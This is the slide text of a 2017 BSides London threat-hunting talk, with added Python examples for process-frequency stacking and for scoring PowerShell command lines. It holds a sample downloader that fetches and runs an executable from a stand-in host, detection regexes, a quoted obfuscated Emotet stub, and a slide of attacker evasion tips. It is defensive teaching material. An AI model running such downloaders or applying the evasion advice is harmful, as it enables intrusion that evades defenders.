
BSides London 2017 - Hunt Or Be Hunted


Over the last few years threat hunting has risen from being a grassroots hands-on defensive technique to all-out hype as security vendors have jumped on the bandwagon. In this talk I wanted to strip away the marketing and talk about real-life threat hunting at scale and how it differs from traditional security monitoring. I'll cover the key datasets, different analytical approaches, cutting-edge TTPs and the people/skills needed to make it happen. I'll also share some real-world compromises that would have been missed by traditional detection but were found through hands-on threat hunting.



  1. HUNT OR BE HUNTED – 7th June 2017
  2. WHOAMI: Senior Threat Hunter @ Countercept; Pentester + Defensive fanboi; Bug Bounty Lover <3; Blogger? @pwndizzle
  3. Threat hunting when you don’t know you’re threat hunting…
  4. What is threat hunting? “The process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions” – Sqrrl
  5. Manual vs Automated (diagram: Offence and Defence plotted from Manual through Semi-Automated to Fully Automated). Offence: Manual Pentesting Tools (nmap), Vuln Scanners (Nessus). Defence: Manual Threat Hunting, Advanced Threat Hunting, Assisted Hunts, Alerts from “products” (AV), Traditional security teams.
  6. The Paris Model (or Hunting Rocket, or APT Eiffel Tower) (diagram): ‘Hunting use case’ generation (hypothesis) → ‘Hunting use case’ execution → Automation → Automated notification, fed by Tactical Threat Intel; capability marked at 10%, 40%, 80% and 99%.
  7. Paris Model In Action. Process: Red team use-case: HTA w/ PS payload; Manual hunt: mshta.exe usage, PS script logging; Automated hunt: suspicious processes/script analysis; Refine automation (increase fidelity): filtering/enrichment. Requirements: People: someone needs to know this technique and understand it well enough to search for it and automate the search; Tech: endpoint visibility required + automated analysis framework.
  8. Where do I start?
  9. What data sources?
  10. Attack stages against data sources (diagram). Stages: Payload delivered, Payload executed, Persistence installed, Escalated Privs, Lateral movement, Data exfiltrated. Sources: Email Filter, Web Proxy, Bro Logs, Firewall, Endpoint, Windows/Linux logs, AV logs, Bro Logs, Web Proxy, App Logs.
  11. How to do analysis?
  12. IOCs are bad* (*if you rely on IOCs as your primary detection technique)
  13. Specific Attacker TTPs – anomaly or context driven. Endpoint/logs: Windows – logins, DCSync, PrivEsc, lockouts; Binaries; Execution – cmd, ps, wscript, wmi; Enumeration – net; Persistence – schtasks, services, registry, cron; In-memory injection; Privilege escalation; UAC bypass. Network: Domain classification/history/age; File analysis – extension, content-type, content, mismatches; Data transfers – uploads/downloads; Dynamic DNS usage; DNS tunneling.
  14. In-Memory Injection. Detection: suspicious threads; unknown module; unusual permissions (e.g. RWX); check for MZ; check for PE header; check for MS-DOS strings. Injection techniques: LoadLibrary; Process Hollowing; Reflective Loading; Hooking. See “Advanced Attack Detection” @ Securitay2017 – https://youtu.be/ihElrBBJQo8
  15. Least Frequency Analysis/Stacking – frequency count of process names. Highest frequency: conhost.exe 11730618; cscript.exe 9819507; cmd.exe 1497875; WmiPrvSE.exe 1444628; dllhost.exe 579741. Lowest frequency (count 1 each): hpzpsl01.exe, ismagent.exe, MSIAE02.tmp, dJK4oMMtx.exe, SketchUp.exe. Anomalies: “That’s a bit weird”.
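Stacking as shown on this slide, as an added example (not the speaker's or Countercept's code): it counts image names over a constructed set of process-creation events, lists the highest- and lowest-frequency names, and adds a per-host spread so that a name seen once on one host stands out from a rare but estate-wide admin tool.

```python
from collections import Counter

# Constructed sample telemetry, (host, image name), standing in for
# process-creation events such as Sysmon event ID 1.
EVENTS = [
    ("ws01", "conhost.exe"), ("ws01", "cmd.exe"), ("ws01", "WmiPrvSE.exe"),
    ("ws02", "conhost.exe"), ("ws02", "cscript.exe"), ("ws02", "dllhost.exe"),
    ("ws03", "conhost.exe"), ("ws03", "WmiPrvSE.exe"), ("ws03", "dllhost.exe"),
    ("ws04", "conhost.exe"), ("ws04", "cmd.exe"), ("ws05", "cscript.exe"),
    ("ws05", "conhost.exe"),
    ("ws02", "dJK4oMMtx.exe"),  # random-looking name, seen once
    ("ws04", "MSIAE02.tmp"),    # executable named like a temp file
]

def image(event):
    """Stacking key: image name, case-folded (Windows paths are case-insensitive)."""
    return event[1].lower()

def stack(events, key=image):
    """Frequency count of `key` over all events."""
    return Counter(key(e) for e in events)

def most_frequent(counts, n=5):
    return counts.most_common(n)

def least_frequent(counts, n=5):
    """The n rarest values, rarest first; ties broken by name for stable output."""
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))[:n]

def host_spread(events, key=image):
    """Distinct hosts per value: a name on a single host is a stronger outlier
    than one that is rare overall but present across the estate."""
    hosts = {}
    for e in events:
        hosts.setdefault(key(e), set()).add(e[0])
    return {k: len(v) for k, v in hosts.items()}

def anomalies(events, max_count=1):
    """(name, count, distinct hosts) for values seen at most `max_count` times."""
    counts, spread = stack(events), host_spread(events)
    return [(n, c, spread[n]) for n, c in least_frequent(counts, len(counts))
            if c <= max_count]

if __name__ == "__main__":
    counts = stack(EVENTS)
    print("Highest frequency:", most_frequent(counts, 3))
    print("Lowest frequency:", least_frequent(counts, 3))
    print("That's a bit weird:", anomalies(EVENTS))
```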
  16. Relationships/Graphing
  17. Clustering/Behaviour Based Detection – https://countercept.com/our-thinking/machine-learning/
  18. Automation
  19. Efficiency is intelligent laziness
  20. Speeding it up: Data analysis with scoring/rules (“Assisted Hunts”); Enrichment/Context; Integrated prevention/response; Ticketing – creation, updating, closing; Payload analysis – VT and Cuckoo integration, IDA/Radare plugins; Comms with other users/clients (https://github.com/dropbox/securitybot)
  21. Welcome to the real world…
  22. Example #1 – Don’t trust your admins: Suspicious executable bstack.exe running from StartUp folder; Compiled Python binary with key-logging capabilities; History of deployment: 1 host, 5 hosts, 27 hosts; Lateral movement using “Advanced IP Scanner”; Targeting ATM management systems! :O
  23. Example #2 – Emotet – Macros+PowerShell <3. Scoring of the launcher command line: Hidden Window (3/10); WebClient Download File (10/10); URL in args (7/10); Start-Process (8/10); Network comms/File writes (9/10); IEX (9/10); Letter/Number/Special Char Ratios (8/10); Decoder Stub (7/10); Length (8/10). The slide’s sample, with the long delimiter-separated string of character codes omitted: IEX( ( '<character codes omitted>'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]$_ -AS [Char]) } ) -Join'' ) – see https://github.com/danielbohannon/Invoke-Obfuscation
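The scoring on this slide as an added example, not the speaker's code: each feature from the slide becomes a regex or ratio check carrying the slide's weight, summed per command line. The network-comms/file-writes feature needs process telemetry rather than a command line and is left out; the regexes, the ratio rule, the 1000-character length cut-off and the 25-point alerting threshold are my assumptions, and the three command lines are constructed.

```python
import re

def odd_char_ratio(cmd):
    """True when digits and punctuation outnumber letters, as in a numeric payload."""
    letters = sum(c.isalpha() for c in cmd)
    others = sum(not c.isalpha() and not c.isspace() for c in cmd)
    return others > letters

# (feature from the slide, its weight out of 10, detector). Detector patterns,
# the 1000-character length cut-off and THRESHOLD are assumptions, not the talk's.
RULES = [
    ("Hidden Window", 3, lambda s: bool(re.search(r"-w(indowstyle)?\s+hidden", s, re.I))),
    ("WebClient Download File", 10,
     lambda s: bool(re.search(r"webclient.*download(file|string)", s, re.I))),
    ("URL in args", 7, lambda s: bool(re.search(r"https?://", s, re.I))),
    ("Start-Process", 8, lambda s: bool(re.search(r"start-process", s, re.I))),
    ("IEX", 9, lambda s: bool(re.search(r"\biex\b|invoke-expression", s, re.I))),
    ("Letter/Number/Special Char Ratios", 8, odd_char_ratio),
    ("Decoder Stub", 7,
     lambda s: bool(re.search(r"\[int\]\$_|\[char\]|\.split\(|-join", s, re.I))),
    ("Length", 8, lambda s: len(s) > 1000),
]
THRESHOLD = 25

def score(cmd):
    """Return (total score, matched feature names) for one PowerShell command line."""
    hits = [(name, w) for name, w, test in RULES if test(cmd)]
    return sum(w for _, w in hits), [name for name, _ in hits]

# Constructed command lines (not real samples).
BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"
DOWNLOADER = ('powershell -w hidden -c "(New-Object Net.WebClient).DownloadFile('
              "'http://example.test/a.exe','$env:TEMP\\a.exe'); Start-Process $env:TEMP\\a.exe\"")
# Character codes of a harmless string, joined with the delimiter the stub splits on.
_CODES = "{".join(str(ord(c)) for c in "Write-Host hello " * 60)
OBFUSCATED = ("powershell -w hidden IEX( ( '" + _CODES +
              "'.SpLiT('{') | ForEach-Object { [Char][Int]$_ } ) -Join '' )")

if __name__ == "__main__":
    for cmd in (BENIGN, DOWNLOADER, OBFUSCATED):
        total, hits = score(cmd)
        print(f"{total:3d} {'ALERT' if total >= THRESHOLD else 'ok'} {hits}")
```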
  24. How to be a stealthier attacker. Foothold: Avoid macros/hta files; Social engineering, exploits, webapps are better; Abuse third party services Facebook/Linkedin; Target personal assets instead of corporate assets. Execution: Avoid new processes and avoid using command line arguments; Avoid Windows utilities – cmd, powershell, net, reg, etc.; Avoid in-memory techniques; Avoid “hacker tools” – Metasploit, CobaltStrike, Mimikatz; Avoid “spraying” credentials; WMI is a better option; Use direct Windows API access where possible; Modify tools/binaries – name, hash, description. Persistence: Avoid SysInternals Autoruns – scheduled tasks, services, registry, cron, launch daemons/agents; WMI and COM not perfect but better than others; Use “hide in plain sight” techniques – Outlook rules, Office templates, DLL side-loading, rootkits, anything involving custom applications; Don’t use persistence if you don’t need to! C2/Exfil: Avoid network comms from processes which don’t have network comms; Avoid newly registered domains, if possible use Google/Twitter/Youtube etc.; Avoid DNS tunneling; Use SSL and outlook/browsers where possible and go low and slow.
  25. DIY Detection: Data – OSQuery, GRR, Sysmon, Bro, Event logs; Storage – Elastic; Analytics – ElasticDSL, Kibana, ElastAlert, 411; Infrastructure – Puppet, Chef, Ansible, Docker
  26. But what about CVE-2017-0144?! Blue is the new red…
  27. QUESTIONS?
